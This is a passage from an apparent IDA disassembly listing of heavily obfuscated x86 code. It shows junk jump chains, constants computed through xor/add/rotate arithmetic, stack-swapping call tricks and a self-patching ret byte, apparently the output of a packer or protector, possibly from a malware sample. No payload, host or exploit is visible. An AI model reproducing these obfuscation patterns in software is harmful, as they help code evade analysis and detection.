		pop	esi
		add	esi, 0A004C04Fh
		xor	esi, 6270D03Fh
		add	eax, esi
		jmp	loc_458E84
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_43FC6F:				; CODE XREF: sub_443525:loc_45A826j
		xchg	esi, [esp+4+var_4]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A3E7

loc_43FC77:				; CODE XREF: sub_44A3E7:loc_45519Cj
		mov	ebx, ecx
		push	offset sub_450D78
		jmp	nullsub_430
; END OF FUNCTION CHUNK	FOR sub_44A3E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_43FC83:				; CODE XREF: sub_43E07B+5FE7j
		shl	esi, 14h
		jz	loc_44DC23
		jmp	loc_444615
; END OF FUNCTION CHUNK	FOR sub_43E07B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43FC92:				; CODE XREF: sub_43F75D+14D8Ej
		jmp	sub_459F8F
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC38

loc_43FC97:				; CODE XREF: sub_43FC38+7j
		jmp	loc_44A76D
; END OF FUNCTION CHUNK	FOR sub_43FC38
; ---------------------------------------------------------------------------

loc_43FC9C:				; CODE XREF: y2kk37jd:00449EB2j
		sbb	edi, esi
		and	edi, 1DFDEB03h
		jmp	loc_44BB1E
; ---------------------------------------------------------------------------
		adc	ecx, 43254B68h
		jmp	loc_455B06
; ---------------------------------------------------------------------------

loc_43FCB4:				; CODE XREF: y2kk37jd:0045A515j
		jo	loc_43B4FC

; =============== S U B	R O U T	I N E =======================================



sub_43FCBA	proc near		; CODE XREF: y2kk37jd:00456C47p
		xchg	edi, [esp+0]
		pop	edi
		pop	ecx
		pop	ebp
		retn
sub_43FCBA	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_283. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43FCC2:				; CODE XREF: y2kk37jd:00441CEEj
		jmp	loc_44A3C4
; ---------------------------------------------------------------------------
		mov	eax, [edx]
		jmp	sub_454DAD
; ---------------------------------------------------------------------------

loc_43FCCE:				; CODE XREF: y2kk37jd:0045444Ej
		jg	loc_4565FC
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_43FCD4:				; CODE XREF: sub_449DFE:loc_44E7C3j
		add	edi, 0DF7A26BEh
		add	edi, ebp
		add	edi, 9707572h
		mov	[edi], eax
		pop	edi
		jmp	loc_4448AB
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_43FCEA:				; CODE XREF: sub_455C79-1556Ej
		xor	edi, 801D88AAh
		add	ebp, ecx
		jb	loc_449C8B

loc_43FCF8:				; CODE XREF: sub_455C79:loc_4406FEj
		sub	esi, 0FA5D429Dh
		jmp	loc_43E34C
; END OF FUNCTION CHUNK	FOR sub_455C79
; ---------------------------------------------------------------------------

loc_43FD03:				; CODE XREF: y2kk37jd:loc_457BB6j
		mov	eax, [esp]
		push	edx
		call	sub_4464B3
		mov	eax, 0E5254649h
		jmp	loc_458430
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_45A783

; =============== S U B	R O U T	I N E =======================================



sub_43FD1C	proc near		; CODE XREF: sub_454C24-15719j
					; y2kk37jd:004491A7p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		add	edx, 0A47F17B5h
		xchg	edx, [esp-4+arg_0]
		jmp	loc_4401EE
sub_43FD1C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43FD2E:				; CODE XREF: sub_4448E2+11B91j
		jz	loc_454EF4

loc_43FD34:				; CODE XREF: y2kk37jd:0045AA27j
		jmp	loc_449342
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		jns	loc_454D9F
		jmp	loc_454EF0
; ---------------------------------------------------------------------------

locret_43FD44:				; CODE XREF: y2kk37jd:loc_43C553j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B583

loc_43FD45:				; CODE XREF: sub_45B583+Dj
		jmp	loc_45BA90
; END OF FUNCTION CHUNK	FOR sub_45B583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_43FD4A:				; CODE XREF: sub_448CAE-835Dj
		jmp	nullsub_196
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_43FD4F:				; CODE XREF: sub_44B489+AFF5j
		cmp	ebx, ecx
		jmp	loc_442734
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_43FD56:				; CODE XREF: sub_43BD0D:loc_447564j
		mov	eax, [ebp+8]
		push	eax
		call	sub_45C4C8
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_445EE7
		jmp	loc_44014F
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------

loc_43FD6E:				; CODE XREF: y2kk37jd:00455B56j
		rol	esi, 12h
		add	esi, 0DF0B5BDDh
		xchg	esi, [esp]
		jmp	loc_451DA1
; ---------------------------------------------------------------------------

loc_43FD7F:				; CODE XREF: y2kk37jd:00449F41j
		mov	ecx, eax
		jmp	loc_43B861
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_392. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43FD87:				; CODE XREF: y2kk37jd:0044F593j
		jmp	loc_446F22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F44F

loc_43FD8C:				; CODE XREF: sub_44F44F+Fj
		rol	eax, 1Fh
		and	eax, 0ECECCA14h
		add	eax, 9B77B80Eh
		push	offset sub_45BC07
		jmp	loc_45107C
; END OF FUNCTION CHUNK	FOR sub_44F44F
; ---------------------------------------------------------------------------

loc_43FDA5:				; CODE XREF: y2kk37jd:0044289Aj
		jz	loc_4484C6
; START	OF FUNCTION CHUNK FOR sub_45B60B

loc_43FDAB:				; CODE XREF: sub_45B60B+Aj
		jmp	loc_44D33B
; END OF FUNCTION CHUNK	FOR sub_45B60B
; ---------------------------------------------------------------------------
		cmp	edi, esi
		jmp	loc_4484BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C2D

loc_43FDB7:				; CODE XREF: sub_455C2D:loc_455C3Ej
		jz	loc_4515B8
		jmp	sub_45562F
; END OF FUNCTION CHUNK	FOR sub_455C2D
; ---------------------------------------------------------------------------
		mov	ds:off_41E1FC, eax
		lea	eax, sub_43EE8A
		mov	byte ptr [eax],	0C3h
		jmp	loc_456CB6

; =============== S U B	R O U T	I N E =======================================



sub_43FDD6	proc near		; CODE XREF: sub_4198C0+BBp
					; sub_43FDD6+5j
					; DATA XREF: ...
		call	sub_43FDE6
		jmp	ds:off_41E200
sub_43FDD6	endp

; ---------------------------------------------------------------------------

loc_43FDE1:				; CODE XREF: y2kk37jd:00441983j
		jmp	loc_440402

; =============== S U B	R O U T	I N E =======================================



sub_43FDE6	proc near		; CODE XREF: sub_43FDD6p
					; sub_45C6B8:loc_4442F0j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044557B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A4A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004578D9 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045C6D0 SIZE 00000008 BYTES

		pop	edx
		jz	loc_45C6D0
		jmp	loc_44A4A8
sub_43FDE6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43FDF2	proc near		; CODE XREF: sub_43B276+3p
					; sub_4507BF:loc_45121Dj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00457197 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ebx, [esp-4+arg_0]
		mov	ebp, esp
		jo	sub_451854
		jmp	loc_457197
sub_43FDF2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43FE06	proc near		; DATA XREF: sub_4578A6:loc_448F56o

; FUNCTION CHUNK AT 0043F7A0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00448410 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458053 SIZE 0000000D BYTES

		push	1134474h
		pop	esi
		sub	esi, 311BAEA0h
		add	esi, 5D9ADF54h
		rol	esi, 14h
		test	esi, 10h
		jmp	loc_458053
sub_43FE06	endp


; =============== S U B	R O U T	I N E =======================================



sub_43FE26	proc near		; DATA XREF: y2kk37jd:loc_455660o

; FUNCTION CHUNK AT 00454E33 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456003 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A9D3 SIZE 0000000B BYTES

		push	3AEA100Ah
		pop	eax
		and	eax, 0DC0C5C5Ch
		rol	eax, 1Fh
		cmp	eax, 4B8DA6E9h
		jmp	loc_45A9D3
sub_43FE26	endp

; ---------------------------------------------------------------------------
		jmp	ds:off_41E0B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_43FE46:				; CODE XREF: sub_44F3F5-116ECj
					; sub_4514DE-11199j ...
		xchg	ecx, [esp+0Ch+var_C]
		mov	edx, ecx
		pop	ecx
		jmp	loc_456246
; END OF FUNCTION CHUNK	FOR sub_4514DE

; =============== S U B	R O U T	I N E =======================================



sub_43FE51	proc near		; CODE XREF: sub_445226+317p
					; y2kk37jd:00452737j

; FUNCTION CHUNK AT 0043B89E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045486F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A57B SIZE 0000001D BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		pop	edx
		pushf
		push	6C76274Dh
		jmp	loc_45A57B
sub_43FE51	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	ds:off_41E01C
; ---------------------------------------------------------------------------

loc_43FE67:				; CODE XREF: y2kk37jd:0044ED6Cj
		jmp	locret_444220
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B38

loc_43FE6C:				; CODE XREF: sub_453B38-81DEj
		jmp	loc_459C2A
; END OF FUNCTION CHUNK	FOR sub_453B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_43FE71:				; CODE XREF: sub_456809-15131j
					; sub_453B0B:loc_444A60j ...
		jz	loc_45AB6C
		pop	edx
		mov	eax, [esp+0]
		push	edx
		push	eax
		push	5B949E5Fh
		pop	eax
		jmp	loc_452764
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43FE88:				; CODE XREF: sub_43F8B8:loc_446199j
		jge	loc_43BC36
		jno	loc_442DD5
		not	eax
		jmp	loc_44F0A6
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43FE9B:				; CODE XREF: sub_43ED19:loc_457297j
		sub	al, 99h
		push	1149B0D9h
		pop	edx
		sub	edx, 7E63E4BFh

loc_43FEA9:				; CODE XREF: sub_4577FE-189C7j
		add	edx, 0C672392h
		rol	edx, 19h
		test	edx, 8
		jmp	loc_44DA34
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_43FEBD:				; CODE XREF: y2kk37jd:loc_44DBE1j
		xor	eax, 0F4306F58h
		or	eax, 0FA8126Fh
		add	eax, 0F0582A1Ch
		xchg	eax, [esp]
		jmp	loc_454125
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_43FED7:				; CODE XREF: sub_43D41D:loc_452C6Ej
		or	edx, eax
		ror	ecx, 14h
		jg	loc_44E0D9
		shl	ebp, 7
		mov	ecx, 79B39A03h

loc_43FEEA:				; CODE XREF: y2kk37jd:004478A0j
		jmp	loc_43EFFE
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
		mov	ebx, 0C264C7F9h
		jmp	sub_454B16
; ---------------------------------------------------------------------------

loc_43FEF9:				; CODE XREF: y2kk37jd:0044DDF7j
		xor	esi, eax

; =============== S U B	R O U T	I N E =======================================



sub_43FEFB	proc near		; CODE XREF: sub_444D5A+6p

; FUNCTION CHUNK AT 0043E3F5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00440CAB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441903 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00446611 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448E0C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459E28 SIZE 00000011 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		div	ecx
		mov	[ebp-20h], edx
		mov	ecx, [ebp-14h]
		call	sub_455B08
		push	edi
		push	0E052B7Ch
		pop	edi
		or	edi, 7EB6BD4Bh
		jmp	loc_446611
sub_43FEFB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jl	loc_443297
		jmp	loc_45AFC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43FF29:				; CODE XREF: sub_43ED19+1954j
					; sub_440B7C:loc_457E46j
		jnz	loc_44F59A
		jmp	loc_44251B
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_43FF34:				; CODE XREF: sub_44F641+4CA0j
		pop	edx
		and	edx, 8565F9Fh
		or	edx, 0FD4D524Dh
		add	edx, 2E460C1h
		xchg	edx, [esp-4+arg_0]
		jmp	loc_44C709
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
		sbb	edx, 713B1DF5h
		jmp	sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442ED1

loc_43FF5A:				; CODE XREF: sub_442ED1:loc_45BD75j
		or	eax, 40B25E19h
		and	eax, ds:4000F3h
		add	eax, 0D373AED0h
		call	sub_44113A
		jmp	loc_45549E
; END OF FUNCTION CHUNK	FOR sub_442ED1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45070F

loc_43FF76:				; CODE XREF: sub_45070F:loc_45795Ej
		add	eax, ebp
		add	eax, 0ADEC8544h
		mov	eax, [eax]
		xchg	edx, [esp+8+var_8]
		push	edx
		jmp	loc_445724
; END OF FUNCTION CHUNK	FOR sub_45070F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_43FF89:				; CODE XREF: sub_44D302-1BC0j
		cdq
; END OF FUNCTION CHUNK	FOR sub_44D302
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43FF8A:				; CODE XREF: sub_4448E2:loc_45A6DEj
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4552E8
		jmp	loc_443EE5
; END OF FUNCTION CHUNK	FOR sub_4448E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_401. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F91

loc_43FF9C:				; CODE XREF: sub_458F91-6FFBj
		jmp	sub_454413
; END OF FUNCTION CHUNK	FOR sub_458F91
; ---------------------------------------------------------------------------
		ja	loc_43D69E
		or	esi, 2482D9Ch
		jmp	sub_4562BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_43FFB2:				; CODE XREF: sub_44107E:loc_44AA80j
		call	sub_45C4C8

loc_43FFB7:				; CODE XREF: y2kk37jd:loc_447892j
		lea	eax, [ebp-0Ch]

loc_43FFBA:				; CODE XREF: sub_456410:loc_4431B9j
		push	eax
		mov	eax, [ebp-8]
		push	esi
		jmp	loc_448083
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
		xchg	esi, ebp
		jmp	sub_45349E
; ---------------------------------------------------------------------------

loc_43FFCB:				; DATA XREF: sub_4425BE+4851o
		pop	ecx
		shl	eax, 7
		jmp	loc_45252F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B37E

loc_43FFD4:				; CODE XREF: sub_43B37Ej
		mov	eax, [ebp+8]
		test	byte ptr [eax-10h], 38h
		jnz	loc_43F403
		mov	eax, [ebp+8]
		jmp	loc_45A380
; END OF FUNCTION CHUNK	FOR sub_43B37E
; ---------------------------------------------------------------------------

loc_43FFE9:				; CODE XREF: y2kk37jd:loc_458F46j
		mov	eax, ecx
		jmp	loc_457778

; =============== S U B	R O U T	I N E =======================================



sub_43FFF0	proc near		; CODE XREF: sub_43BD0D:loc_445EE7p
					; y2kk37jd:0044A6CFj

; FUNCTION CHUNK AT 0044100B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00457BBB SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, 120h
		push	edx
		push	2F8ACA7Ah
		pop	edx
		jmp	loc_44100B
sub_43FFF0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_440005:				; CODE XREF: sub_443EAB:loc_457959j
		add	ecx, 0F63BFAACh
		mov	[ecx], edx
		pop	ecx
		pushf
		call	sub_44931C

loc_440014:				; CODE XREF: sub_456136-2EB2j
		jmp	loc_4430E8
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------
		jmp	loc_458279

; =============== S U B	R O U T	I N E =======================================



sub_44001E	proc near		; CODE XREF: sub_448CAE-AF31p
					; y2kk37jd:0043DF3Dj

var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B5F2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043CC33 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043E33D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043E41C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004401F3 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00441412 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004416B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004431DD SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00445DB2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446E91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004472BA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447A28 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00447AE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448AE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C8C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449156 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004491AC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A2CA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A4FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A9A4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044B90F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D52F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D9A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450186 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452DBE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045414C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004560DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456650 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004575B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457EA3 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00459657 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459A04 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459CA1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A797 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C0AB SIZE 0000001A BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	eax, 795234A8h
		mov	eax, [eax]
		jmp	loc_447A28
sub_44001E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jz	loc_453E7B
		jmp	sub_44D39B
; ---------------------------------------------------------------------------

loc_44003A:				; CODE XREF: y2kk37jd:00456276j
		jl	loc_456235

; =============== S U B	R O U T	I N E =======================================



sub_440040	proc near		; CODE XREF: sub_4554A3:loc_442C1Cp

; FUNCTION CHUNK AT 0043D29E SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044799E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451AEE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045296F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457D42 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457E81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459B32 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045C46F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C6B3 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, ds:dword_4424BC
		or	eax, eax
		jmp	loc_457E81
sub_440040	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_440051:				; CODE XREF: y2kk37jd:00455E00j
		or	edx, edi

loc_440053:				; CODE XREF: y2kk37jd:loc_444F88j
		or	ecx, 659B9179h
		xor	ecx, 9B12995Eh
		add	ecx, 935AAD57h
		xchg	ecx, [esp]
		jmp	sub_44AD49
; ---------------------------------------------------------------------------

loc_44006D:				; CODE XREF: y2kk37jd:0045572Aj
		jnz	loc_44034A

loc_440073:				; CODE XREF: y2kk37jd:loc_455711j
		sub	ebx, 74802E8Ch
		rol	ebx, 9
		add	ebx, 536C87A9h
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_440082:				; CODE XREF: sub_442EB4:loc_43F170j
		xchg	ebx, [esp+0]
		jmp	loc_44826C
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44008A:				; CODE XREF: sub_442A84+94E3j
		jns	loc_441C58
		adc	ebx, 0EF044226h
		sbb	edi, ebx
		pop	ebp
		jmp	loc_43ECFC
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44009E:				; CODE XREF: sub_445226+12D15j
		jz	loc_44FC3B
		jmp	loc_455EC8
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_4400A9:				; CODE XREF: y2kk37jd:0044E0C8j
		xor	eax, edi

loc_4400AB:				; CODE XREF: y2kk37jd:loc_44E0B1j
		and	edx, 1E674067h
		push	offset sub_442F9C
		jmp	locret_44CE1C
; ---------------------------------------------------------------------------

loc_4400BB:				; CODE XREF: y2kk37jd:00440B11j
		jle	loc_4427ED

loc_4400C1:				; CODE XREF: y2kk37jd:loc_45A269j
		push	0EDC48851h
		pop	eax
		add	eax, 2BDA7929h
		or	eax, 8B719C56h
		jmp	loc_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4400D8:				; CODE XREF: sub_445226+229j
		call	sub_441FCA
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_4400DD:				; CODE XREF: y2kk37jd:loc_44AA90j
		mov	ebx, 0AAE0C12Eh
		jmp	sub_43CC73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EAA2

loc_4400E7:				; CODE XREF: sub_44EAA2+763j
		mov	eax, [esp+0]
		push	offset sub_442FAC
		jmp	nullsub_476
; END OF FUNCTION CHUNK	FOR sub_44EAA2
; ---------------------------------------------------------------------------

loc_4400F4:				; CODE XREF: y2kk37jd:0044F02Dj
		ja	loc_450D50
		add	eax, 8604850Dh
		jge	loc_450186
		push	2DDC6394h
		jmp	loc_43F7E1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_448. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452441

loc_440111:				; CODE XREF: sub_452441+557Fj
		jmp	loc_4526D2
; END OF FUNCTION CHUNK	FOR sub_452441
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_440116:				; CODE XREF: sub_454E20-D870j
		jb	loc_445915

loc_44011C:				; CODE XREF: sub_454E20:loc_440605j
					; y2kk37jd:loc_445F51j
		call	sub_45405E
		mov	edx, 0BE8CE1B7h
		push	eax
		push	7FCBE66Ah
		pop	eax
		sub	eax, 1193307Dh
		jmp	loc_4461B0
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
		jl	loc_4550DC
		jmp	sub_4571F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_440143:				; CODE XREF: sub_4448E2:loc_455482j
		jz	loc_4471AE
		jmp	loc_4521CF
; END OF FUNCTION CHUNK	FOR sub_4448E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44014F:				; CODE XREF: sub_43BD0D+405Cj
		jmp	loc_4460AF
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		rol	edi, 10h
		jg	loc_44E011
		jmp	sub_453315
; ---------------------------------------------------------------------------

loc_440162:				; CODE XREF: y2kk37jd:0043E9F5j
		and	eax, 0B40EED37h
		or	eax, 65D5B1C1h
		call	sub_44894A
; START	OF FUNCTION CHUNK FOR sub_446E19

loc_440173:				; CODE XREF: sub_446E19:loc_45BAEBj
		xchg	edi, [esp+4+var_4]
		jmp	loc_455A33
; END OF FUNCTION CHUNK	FOR sub_446E19
; ---------------------------------------------------------------------------

loc_44017B:				; DATA XREF: sub_4476EE+11o
		jnz	loc_44296F
		call	nullsub_11
		call	sub_451F6F
; START	OF FUNCTION CHUNK FOR sub_4513DB

loc_44018B:				; CODE XREF: sub_4513DB+5j
		jmp	nullsub_109
; END OF FUNCTION CHUNK	FOR sub_4513DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459158

loc_440190:				; CODE XREF: sub_459158:loc_456921j
		jnz	loc_451DEE
; END OF FUNCTION CHUNK	FOR sub_459158
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_440196:				; CODE XREF: sub_4411C3:loc_456F85j
		jmp	loc_447CF8
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_44019B:				; DATA XREF: sub_44A8B6-DFAEo
		push	esi
		pushf
		push	7B5392C0h
		pop	esi
		add	esi, 45D93170h
		jmp	loc_454A04
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_440D56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_4401B4:				; CODE XREF: sub_443BAF-453Fj
		jz	loc_454BE0
		jle	loc_44DEBA
		js	loc_44B826
		mov	esi, 96D058h
		jmp	loc_454BDE
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4401D0:				; CODE XREF: sub_44AC89+B8FCj
		sub	ebx, 0F59403EAh
; END OF FUNCTION CHUNK	FOR sub_44AC89

; =============== S U B	R O U T	I N E =======================================



sub_4401D6	proc near		; CODE XREF: sub_44AC89:loc_4442F5j
		push	ebx
		push	8547F20h
		pop	ebx
		or	ebx, 0DAD574F9h
		xor	ebx, 0DAD57FF9h
		call	sub_456890

loc_4401EE:				; CODE XREF: sub_43FD1C+Dj
		jmp	loc_457B27
sub_4401D6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_4401F3:				; CODE XREF: sub_44001E+A2B5j
					; sub_44001E:loc_4575B9j
		push	6A686FEEh
		pop	eax
		xor	eax, 6691B15Ah
		or	eax, 0A969C8A1h
		add	eax, 2BD93AEEh
		xor	eax, 23B263EDh
		add	eax, ebp
		jmp	loc_44D9A7
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C5CF

loc_440218:				; CODE XREF: sub_45C5CF+16j
		add	eax, 0FA73D789h
		push	edi
		push	0F1971C68h
		pop	edi
		xor	edi, 7D071150h
		sub	edi, 8D8EB5D8h
		xor	edi, ds:4000EEh
		jmp	loc_441A12
; END OF FUNCTION CHUNK	FOR sub_45C5CF

; =============== S U B	R O U T	I N E =======================================



sub_44023C	proc near		; CODE XREF: sub_45877C-D7C4j
					; sub_45877C:loc_456C60j

var_30		= dword	ptr -30h
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_8		= dword	ptr -8
